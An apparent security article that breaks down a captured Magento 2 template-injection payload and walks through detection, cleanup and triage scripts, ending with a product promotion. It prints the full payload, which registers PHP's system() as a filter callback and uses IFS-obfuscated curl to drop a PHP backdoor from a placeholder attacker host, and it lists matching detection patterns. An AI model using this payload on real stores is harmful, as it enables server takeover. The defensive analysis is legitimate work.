Script Explanation
We'll investigate the script below, which was taken from an attempted attack on a Magento 2 website. It is a template-injection payload: it abuses the directive syntax of Magento's template filter to run shell commands on the server, which can compromise the whole system. Here's a breakdown of what it does:
{{var this.getTemplateFilter().filter(order)}} {{var this.getTemplateFilter().addAfterFilterCallback(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://x.x.x.x/cache.php?m=8089-28808-12394)}}
Breakdown of the Script
- {{var this.getTemplateFilter().filter(order)}}: On its own this call is harmless. It fetches the template filter object and runs it over the literal string "order", which produces nothing of interest. It is probably there to make sure a filter object exists for the next directive to reuse rather than to look innocent; either way, it executes nothing by itself.
- {{var this.getTemplateFilter().addAfterFilterCallback(system).Filter(...)}}: This is the injection proper. addAfterFilterCallback() registers a PHP callable that the filter invokes on its output after every filtering pass, and the attacker registers PHP's built-in system(). The chained .Filter(...) call then filters the attacker's string and hands the result to system(), which runs it in a shell with the privileges of the web server or PHP-FPM user. (PHP method names are case-insensitive, so Filter and filter are the same method.)
- cd${IFS%??}pub: Changes into the pub directory of your Magento installation, which is the web root. ${IFS%??} is ordinary shell parameter expansion: IFS, the Internal Field Separator, defaults to a space, a tab and a newline, and the %?? suffix strips the last two characters, leaving a single space. It is a way to put a space into the command without writing a space character, to get past filters that strip or reject whitespace in the injected value.
- curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://x.x.x.x/cache.php?m=8089-28808-12394: The critical part. Once the IFS trick is decoded this reads curl -o cache.php http://x.x.x.x/cache.php?m=8089-28808-12394. It downloads a file from the attacker's server (x.x.x.x stands in for the real IP address or domain) and saves it as cache.php in pub. Because pub is the document root, the file is immediately reachable over HTTP as /cache.php on your store. The m= query string is not a Magento parameter; it is presumably an identifier the attacker's server uses for its own bookkeeping.
The net effect is a backdoor: a PHP file of the attacker's choosing, written into a publicly reachable directory with the privileges of the web server process. Once it is in place the attacker needs no further vulnerability; simply requesting cache.php runs whatever the downloaded file contains, and from there they can take over the rest of the site.
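To see the shell-level obfuscation the way the server's shell does, the following POSIX sh script decodes the command string from the payload above. It is an added example, not code from the original page or from the attacker; it only parses the string and never runs or downloads anything, and x.x.x.x is left exactly as the page's placeholder.

```shell
#!/bin/sh
# Added example, not part of the original page: decode the shell-level
# obfuscation in the captured payload and confirm what ${IFS%??} expands to.
# Nothing here is executed or downloaded; the command string is only parsed.

# The command string exactly as it appears in the captured payload. x.x.x.x is
# the page's placeholder for the attacker's host; this script never contacts it.
PAYLOAD_CMD='cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://x.x.x.x/cache.php?m=8089-28808-12394'

# Byte length of what ${IFS%??} expands to in this shell. With the default IFS
# (space, tab, newline) the "%??" strips the tab and newline, leaving one space.
ifs_trick_len() {
    printf '%s' "${IFS%??}" | wc -c | tr -d ' '
}

# Rewrite the common IFS spellings (${IFS%??}, ${IFS}, $IFS) as plain spaces so
# the command reads the way the shell will see it.
decode_ifs() {
    printf '%s' "$1" | sed -e 's/\${IFS%??}/ /g' -e 's/\${IFS}/ /g' -e 's/\$IFS/ /g'
}

# Split the decoded chain on ';' and print one command per line, so each
# stage can be read, and searched for in logs, on its own.
list_commands() {
    decode_ifs "$1" | tr ';' '\n'
}

# Number of commands in the chain.
count_commands() {
    list_commands "$1" | grep -c .
}

# The URL the download stage would fetch, extracted without fetching it.
extract_url() {
    list_commands "$1" | grep -oE 'https?://[^ ]*' | head -n 1
}

printf '%s\n' "\${IFS%??} expands to $(ifs_trick_len) byte(s)"
printf '%s\n' 'Decoded command chain:'
list_commands "$PAYLOAD_CMD" | sed 's/^/  /'
printf '%s\n' "Download URL (not contacted): $(extract_url "$PAYLOAD_CMD")"
```

The decoded output is the plain two-command chain (cd pub, then the curl download), which is also the form worth searching for in request logs, since attackers vary the IFS spelling but rarely the commands.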
How to Check if the Script was Successful
To determine if the malicious script was successfully executed on your Magento server, follow these detailed steps:
1. Check for the Presence of Malicious Files
Navigate to the pub directory of your Magento installation and look for a file named cache.php or any other unfamiliar PHP file. A stock install typically has only a handful of PHP files directly in pub (index.php, cron.php, get.php, static.php, health_check.php) plus the error-page templates under pub/errors; pub/media and pub/static should contain no PHP at all. You can use the following commands in the terminal:
cd /path/to/magento/pub
ls -l
If you find cache.php or any file you cannot account for, that is a strong indicator that the script was successful. The file name is the attacker's choice, so a different name, or a file dropped under media or static instead, does not mean the attack failed.
2. Check the Last Modified Date and Time of Files
Reviewing the last modified dates of files, especially in the pub directory, helps you identify when a file was added or changed and whether that fits the window of the attack. Use the following commands to list the pub directory sorted by modification time:
cd /path/to/magento/pub
ls -lt
This lists all files in the directory with the most recently modified at the top. Look for files modified at unusual times, especially ones that line up with when you suspect the attack occurred.
You can also check a specific file's timestamps with:
stat cache.php
Compare the Modify and Change lines in the output. An attacker can back-date the modification time with touch, but the inode change time (Change) cannot be set that way, so a file whose Change is much later than its Modify has had its timestamps tampered with.
3. Review Server Logs
Examine your web server logs for any signs of unauthorized access or unusual activity, especially around the time you suspect the script was executed. Check both access logs and error logs (the paths below are for Apache on Debian/Ubuntu; nginx writes to /var/log/nginx/ by default):
tail -n 1000 /var/log/apache2/access.log
tail -n 1000 /var/log/apache2/error.log
Be clear about what these logs can and cannot show. The outbound curl request is made by the server itself, so it never appears in the web server's own access log. What you can find there is the inbound request that delivered the payload, if it travelled in a URL or query string: search for getTemplateFilter, addAfterFilterCallback, {{var (usually URL-encoded as %7B%7Bvar) and IFS. More reliably, look for later requests to /cache.php, which are the attacker using the backdoor. Payloads sent in a POST body are not logged by default, so not finding the payload in the access log does not mean it was never sent. The error log may hold PHP warnings from the callback, or a curl error if the download failed.
4. Inspect the Magento Database
The injection is delivered through content that Magento later runs through its template filter, and an attacker with code execution may also have changed configuration or created accounts, so check the database as well. Look in particular at the following tables:
core_config_data
admin_user
customer_entity
To query the database, you can use the following MySQL commands:
mysql -u username -p
USE magento_db;
SELECT config_id, scope, scope_id, path, value FROM core_config_data WHERE value LIKE '%{{var%' OR value LIKE '%cache.php%' OR value LIKE '%<script%';
Replace username with your MySQL username and magento_db with your Magento database name. Injected content lands in the value column, not in path, which is why the query searches value. Review every hit: legitimate analytics and tracking snippets also live in core_config_data, so compare each value against what you deployed. In admin_user, look for accounts you did not create and for recent created and modified values. In customer_entity and in order address fields, search for names or addresses containing {{, which is one way a template-injection payload can be delivered. Suspicious data in any of these tables means the attack went beyond dropping a file.
5. Monitor for Unusual Network Activity
Check your server's network activity for unexpected outbound connections. Note that the curl download in the payload is a one-off that finishes in seconds, so you will not catch it this way after the fact; what this check can find is a persistent connection from a web server or PHP-FPM process to an unfamiliar host, such as a reverse shell started from the dropped file. Run it as root so that the owning process is shown:
sudo netstat -tnp | grep ESTABLISHED
Look for connections owned by the web server's PHP processes to IP addresses you do not recognise, particularly the host from the URL in the script. On systems without netstat, ss -tnp gives the same information.
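The file-system and log checks above can be scripted so they are run the same way every time. The POSIX sh script below is an added example, not part of the original page or of Magento: it lists unexpected PHP files under pub, lists recently modified ones, and greps an access log for the injection indicators and for requests to the dropped file. The pub layout, the dropped files and the Apache log lines (with RFC 5737 documentation addresses) are constructed for the demo; the allowlist of expected PHP files is an assumption to check against a clean copy of your own install; and PUB_DIR and ACCESS_LOG should be pointed at real paths to use it.

```shell
#!/bin/sh
# Added example, not part of the original page: a triage script that runs the
# file-system and log checks above against a Magento pub/ directory and a
# web server access log. Everything it inspects here (the pub/ layout, the
# dropped files, the log lines, the 203.0.113.x / 198.51.100.x addresses)
# is constructed for the demo; point PUB_DIR and ACCESS_LOG at real paths
# to run it for real.

# PHP files a stock Magento 2 pub/ directory is expected to hold at top level.
# Assumption: compare this list against a clean copy of your own install.
EXPECTED_PUB_PHP='cron.php get.php index.php static.php health_check.php'

# PHP files under pub/ that should not be there: any top-level file outside
# the list above, and any PHP file at all under media/, static/ or other
# asset directories. pub/errors/ ships its own PHP templates and is skipped.
suspicious_php_files() {
    dir=$1
    find "$dir" -type f -name '*.php' ! -path "$dir/errors/*" | while read -r f; do
        rel=${f#"$dir"/}
        case " $EXPECTED_PUB_PHP " in
            *" $rel "*) ;;          # expected file, ignore
            *) echo "$rel" ;;       # e.g. cache.php or media/wysiwyg/x.php
        esac
    done | sort
}

# PHP files under pub/ modified in the last N days (default 7). Attackers can
# reset mtime with touch, so treat this as a hint and confirm with stat.
recent_php_files() {
    find "$1" -type f -name '*.php' -mtime -"${2:-7}"
}

# Indicators of the injection itself in the request log. The payload is
# usually URL-encoded, so both raw and encoded forms are matched.
INJECTION_PATTERN='getTemplateFilter|addAfterFilterCallback|\{\{var|%7B%7Bvar|IFS%'

injection_requests() {
    grep -iE "$INJECTION_PATTERN" "$1" || true
}

# Requests for the dropped file. These appear even when the payload came in
# a POST body the log did not record. The pattern is anchored to the request
# path so /media/catalog/product/cache/... does not match.
backdoor_requests() {
    grep -E '"(GET|POST) /cache\.php' "$1" || true
}

# Build the constructed demo environment in a temporary directory.
setup_demo() {
    DEMO_ROOT=$(mktemp -d)
    PUB_DIR=$DEMO_ROOT/pub
    ACCESS_LOG=$DEMO_ROOT/access.log
    mkdir -p "$PUB_DIR/errors" "$PUB_DIR/media/wysiwyg"
    for f in $EXPECTED_PUB_PHP errors/404.php; do : > "$PUB_DIR/$f"; done
    echo 'stand-in for the dropped file' > "$PUB_DIR/cache.php"
    echo 'stand-in for a second drop'   > "$PUB_DIR/media/wysiwyg/x.php"
    # Constructed Apache combined-format lines: normal traffic, the payload in
    # a query string, a POST whose body is not logged, and two backdoor hits.
    cat > "$ACCESS_LOG" <<'EOF'
203.0.113.45 - - [12/Aug/2024:03:14:07 +0000] "GET /index.php/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Aug/2024:03:14:09 +0000] "GET /index.php/?q=%7B%7Bvar%20this.getTemplateFilter().filter(order)%7D%7D HTTP/1.1" 200 3881 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Aug/2024:03:14:11 +0000] "POST /customer/account/createpost/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Aug/2024:03:15:02 +0000] "GET /cache.php HTTP/1.1" 200 12 "-" "curl/7.88.1"
203.0.113.45 - - [12/Aug/2024:03:15:40 +0000] "POST /cache.php HTTP/1.1" 200 2048 "-" "curl/7.88.1"
198.51.100.7 - - [12/Aug/2024:03:16:00 +0000] "GET /media/catalog/product/cache/a1/image.jpg HTTP/1.1" 200 40112 "-" "Mozilla/5.0"
EOF
}

report() {
    echo "== Unexpected PHP files under $PUB_DIR"
    suspicious_php_files "$PUB_DIR"
    echo "== PHP files modified in the last 7 days"
    recent_php_files "$PUB_DIR" 7
    echo "== Requests carrying injection indicators"
    injection_requests "$ACCESS_LOG"
    echo "== Requests to the dropped file"
    backdoor_requests "$ACCESS_LOG"
}

setup_demo
report
```

In the demo the POST line yields nothing even though it is the kind of request a payload could arrive in, while the two hits on /cache.php from a curl user agent stand out; that asymmetry is why the backdoor-request check is the more dependable of the two log checks.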
What to Do If the Script was Successful
If you find evidence that the script was successful, follow these steps to secure your Magento store:
1. Isolate the Affected Server
Immediately take the affected server off the network, or at least block inbound web traffic to it, to prevent further damage or data leakage. Before you change anything on disk, preserve evidence: copy the web server logs and the pub directory somewhere safe and, if the server is a virtual machine, take a snapshot. You will need these to work out how the attacker got in, and the timestamps from the checks above to choose a clean backup.
2. Remove Malicious Files
Manually delete any malicious files you identified, such as cache.php in the pub directory:
rm /path/to/magento/pub/cache.php
Keep a copy outside the web root first, with its timestamps preserved and its hash recorded, so the file can be analysed later. Also check the rest of the installation for other suspicious files, for modified core files (compare against a clean copy or your version control), for admin users you did not create, and for entries in the web server user's crontab: a single dropped file is rarely the only change an attacker makes.
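Rather than an outright rm, a quarantine step keeps the file for analysis and records what was known about it at the moment of removal. The POSIX sh function below is an added example, not part of the original page: it writes the file's hash, size and timestamps to a manifest, copies the file with its permissions and modification time preserved, and only then removes the original. The demo file and evidence directory are constructed here; it assumes sha256sum from coreutils, with shasum as a fallback.

```shell
#!/bin/sh
# Added example, not part of the original page: move a suspicious file into an
# evidence directory instead of deleting it outright, recording its hash and
# timestamps first. The file and the evidence location are constructed for
# the demo; pass real paths to use it.

# SHA-256 of a file, using coreutils sha256sum or, failing that, shasum.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# quarantine_file <file> <evidence_dir>
# Appends path, hash, size and timestamps to <evidence_dir>/manifest.txt,
# copies the file there with permissions and mtime preserved (cp -p), then
# removes the original. Prints the path of the preserved copy.
quarantine_file() {
    src=$1
    evidence=$2
    mkdir -p "$evidence"
    name=$(basename "$src")
    hash=$(file_sha256 "$src")
    # ls -l records size and mtime; stat also records the inode change time,
    # which an attacker cannot back-date with touch.
    {
        printf 'file=%s\nsha256=%s\n' "$src" "$hash"
        ls -l "$src"
        stat "$src" 2>/dev/null || true
        echo '---'
    } >> "$evidence/manifest.txt"
    # Only remove the original once the copy is confirmed to be in place.
    cp -p "$src" "$evidence/$name.quarantined" || return 1
    rm -f "$src"
    echo "$evidence/$name.quarantined"
}

# Demo on a constructed stand-in for pub/cache.php.
DEMO_ROOT=$(mktemp -d)
mkdir -p "$DEMO_ROOT/pub"
echo 'stand-in for the dropped file' > "$DEMO_ROOT/pub/cache.php"
QUARANTINED=$(quarantine_file "$DEMO_ROOT/pub/cache.php" "$DEMO_ROOT/evidence")
echo "preserved copy: $QUARANTINED"
```

Keep the evidence directory outside the web root and readable only by root; the quarantined copy is still the attacker's code, and the .quarantined suffix stops the web server from executing it as PHP if it ever ends up somewhere served.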
3. Restore from Backup
If possible, restore your Magento store from a clean backup made before the attack occurred, using the file timestamps and log entries you found to confirm the backup predates the first malicious request. This is the safest way to remove all traces of the script, but it restores the vulnerable code too: patch immediately after restoring, or the attack will simply be repeated.
4. Change All Credentials
Change all passwords for your Magento admin, database, FTP/SSH and any other accounts associated with the affected server, and revoke and reissue API integration tokens. Because the attacker ran code as the web server user, assume they could read app/etc/env.php, which holds the database credentials and the encryption key, and rotate the encryption key from the admin's Manage Encryption Key page as well. Finally, log out all admin sessions so that any stolen session cookies stop working.
5. Patch and Update
Ensure your Magento installation and all extensions are fully updated to the latest versions, or at least have the current security patches applied, to close known vulnerabilities. This reduces the risk of similar attacks in the future.
6. Implement Security Measures
Enhance your Magento store's security by installing a Web Application Firewall (WAF), enabling Two-Factor Authentication (2FA), and using security-focused extensions like ScriptGuard Pro.
7. Scan for Malware
Run a thorough malware scan on your server to detect any other potential threats. Use tools like ClamAV or a dedicated Magento security scanner.
8. Monitor for Recurrence
After taking these steps, closely monitor your server and Magento store for any signs of recurring attacks or suspicious activity. This ongoing vigilance is crucial in the aftermath of an attack.
How ScriptGuard Pro Blocks This Attack
ScriptGuard Pro can prevent such attacks by blocking the injection of malicious scripts into your Magento store. It does this by filtering out dangerous characters and commands before they can be executed, ensuring your store is protected from unauthorized code execution.
To find out more details on how to protect your Magento store using ScriptGuard Pro, please visit https://www.lecsoft.co.uk/scriptguardpro.html